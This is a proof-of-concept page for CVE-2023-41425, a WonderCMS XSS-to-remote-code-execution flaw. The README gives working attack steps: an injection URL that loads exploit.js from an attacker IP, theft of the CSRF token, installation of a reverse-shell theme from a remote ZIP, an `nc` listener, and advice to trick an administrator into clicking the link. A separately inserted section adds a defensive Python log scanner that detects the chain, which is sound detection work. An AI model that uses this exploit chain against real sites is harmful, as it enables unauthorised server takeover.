
CVE-2023-41425 PoC — WonderCMS security vulnerability

Associated Vulnerability
Title: WonderCMS security vulnerability (CVE-2023-41425)
Description: WonderCMS is an open-source content management system (CMS) written in PHP. WonderCMS versions v3.2.0 through v3.4.2 contain a security vulnerability. An attacker can exploit it to execute arbitrary code via a specially crafted script uploaded to the installModule component.
Readme
# WonderCMS Exploit for CVE-2023-41425

## Description
This script exploits a Cross-Site Scripting (XSS) vulnerability in WonderCMS to deliver a reverse shell to the attacker's machine. It works by leveraging the XSS to inject malicious JavaScript, steal the CSRF token, and install a reverse shell theme. There is no need to be admin or to know the admin password.

## How It Works
1. The attacker serves the `exploit.js` file via a web server (e.g., Python's `http.server`).
2. The attacker crafts a malicious URL that injects this script into the target site.
3. The script:
   - Steals the CSRF token from the page.
   - Sends requests to install and execute a reverse shell theme on the victim's server.
   - Triggers the reverse shell to connect back to the attacker's machine.

## Prerequisites
- A web server to host `exploit.js`.
- A listener for the reverse shell (e.g., `nc -lvnp <port>`).
- Reverse shell ZIP file available online (e.g., `rev.zip`).
- An administrator who clicks on the malicious link (e.g., via social engineering).

## Usage
1. **Configure the script:**
   Edit the constants in `exploit.js`:
   - `CMS_URL`: Base URL of the target (e.g., `http://victim.abc/cms`).
   - `ATTACKER_IP`: Your machine's IP address (e.g., `10.10.14.123`).
   - `ATTACKER_LISTENER_PORT`: The port you're listening on (e.g., `4444`).
   - `REV_SHELL_URL`: The URL hosting your reverse shell ZIP file (e.g., `http://10.10.14.123/rev.zip`).

2. **Host the script:**
   Start a web server in the directory containing `exploit.js`:
   ```
   python3 -m http.server 8000
   ```

3. **Craft the exploit URL:** 
    Replace `<ATTACKER_IP>` and `<PORT>` with your details in the following template. Fill in `<WONDER_CMS_ROOT_URL>` with the URL of the WonderCMS installation on the victim website. To find this, look for the login URL; the root URL is one directory above it, e.g. for `http://victim.abc/wondercms/loginURL/` the root URL would be `http://victim.abc/wondercms/`.
    ```
    http://<WONDER_CMS_ROOT_URL>/index.php?page=loginURL?\"></form><script+src=\"http://<ATTACKER_IP>:<PORT>/exploit.js\"></script><form+action=\"
    ```

4. **Execute the attack:** 
    Share the malicious URL with the target administrator. Once the link is visited, the reverse shell is delivered, and the attacker gets access.

5. **Start the listener:** 
    On your machine, run:
    ```
    nc -lvnp <ATTACKER_LISTENER_PORT>
    ```

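Detection-side note, added to this cached copy and not part of the PoC README: the chain described under How It Works leaves two recognizable request shapes in the target's web server access log, a `page=` parameter carrying HTML markup (the injection template in step 3) and an `installModule` request pointing at an external ZIP (the theme-install step the CVE description refers to). The Python scanner below flags both over constructed sample log lines in combined format. The log format, the sample addresses and the assumption that `installModule` appears as a query parameter are mine, not taken from the page or the PoC.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (combined format); addresses are documentation ranges, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wondercms/index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /wondercms/index.php?page=loginURL%3F%22%3E%3C%2Fform%3E%3Cscript+src%3D%22http%3A%2F%2F203.0.113.7%3A8000%2Fexploit.js%22%3E%3C%2Fscript%3E%3Cform+action%3D%22 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /wondercms/index.php?installModule=http%3A%2F%2F203.0.113.7%2Frev.zip HTTP/1.1" 200 128 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:01:00 +0000] "GET /wondercms/index.php?page=about HTTP/1.1" 200 640 "-" "Mozilla/5.0"
"""

# Combined log format request line: client IP, timestamp, method, target and status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# HTML tags and schemes that have no business inside a CMS page name.
MARKUP_RE = re.compile(r"<\s*/?\s*(script|form|img|svg|iframe)\b|javascript:", re.IGNORECASE)


def analyze_request_target(target):
    """Return a list of (finding_kind, detail) tuples for one request target.

    Two checks, both derived from the attack chain in the README:
      * the `page` parameter containing markup or quote characters (XSS injection);
      * `installModule` (assumed query parameter name) pointing at a remote URL
        (theme/plugin install from an attacker-hosted ZIP).
    """
    findings = []
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values

    for value in params.get("page", []):
        if MARKUP_RE.search(value) or any(c in value for c in '<>"'):
            findings.append(("xss_in_page_param", value))

    for value in params.get("installModule", []):
        if re.match(r"https?://", value, re.IGNORECASE):
            findings.append(("remote_module_install", urlsplit(value).hostname))

    return findings


def scan_log(text):
    """Scan raw access-log text; return one alert dict per finding."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a combined-format request line; skip it
        for kind, detail in analyze_request_target(m["target"]):
            alerts.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "status": m["status"],
                "kind": kind,
                "detail": detail,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f'{alert["ts"]} {alert["ip"]} {alert["kind"]}: {alert["detail"]}')
```

Run against a real log by reading the file into `scan_log`. A `remote_module_install` alert that follows an `xss_in_page_param` alert from the same client within a short window is the strongest signal of this chain; either one alone is still worth a look, since a legitimate page name never contains angle brackets and a module install from an unfamiliar host should be rare.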
## Disclaimer
This code is intended for educational purposes only. Do not use it on systems you do not own or have explicit permission to test. Unauthorized exploitation of vulnerabilities is illegal and unethical.

## References
This is based on https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413 by https://github.com/prodigiousMind with a few tweaks and fixes, hopefully making it more intuitive to use.

## License
MIT License
File Snapshot

[4.0K] /data/pocs/3eeea610c7a7857f77038aa810efd9e60999f858
├── [2.3K] exploit.js
├── [1.0K] LICENSE
├── [2.6K] main.zip
└── [2.8K] README.md

0 directories, 4 files